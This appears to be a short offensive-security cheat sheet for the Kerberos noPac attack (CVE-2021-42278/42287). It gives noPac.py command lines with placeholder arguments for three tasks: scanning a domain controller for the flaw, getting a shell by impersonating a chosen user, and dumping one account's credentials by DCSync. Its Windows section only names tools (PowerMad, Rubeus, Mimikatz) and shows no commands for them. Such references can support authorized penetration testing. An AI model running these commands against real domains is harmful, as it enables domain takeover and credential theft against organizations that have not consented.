PRIMARY CATEGORY → KERBEROS
Theory
CVE-2021-42278
CVE-2021-42287
Abusing - UNIX-like
Manual Workflow → KRBrelayx + Impacket
NoPac.py
Check whether a Target is vulnerable or not
python3 scanner.py -dc-ip '<TARGET>' '<DOMAIN>/<USER>:<PASSWD>'Abusing Unpatched Target to get a Shell
-shell
python3 noPac.py -dc-ip '<TARGET>' -use-ldap --impersonate '<USER_TO_IMPERSONATE>' -shell '<DOMAIN>/<USER>:<PASSWD>'Abusing Unpatched Target to DCSync a certain User Account
-dump
python3 noPac.py -dc-ip '<TARGET>' -use-ldap --impersonate '<USER_TO_IMPERSONATE>' -dump -just-dc-user '<USER_TO_DCSYNC>' '<DOMAIN>/<USER>:<PASSWD>'Abusing - Windows
Manual Workflow → PowerMad + Rubeus + Mimikatz
Zoom in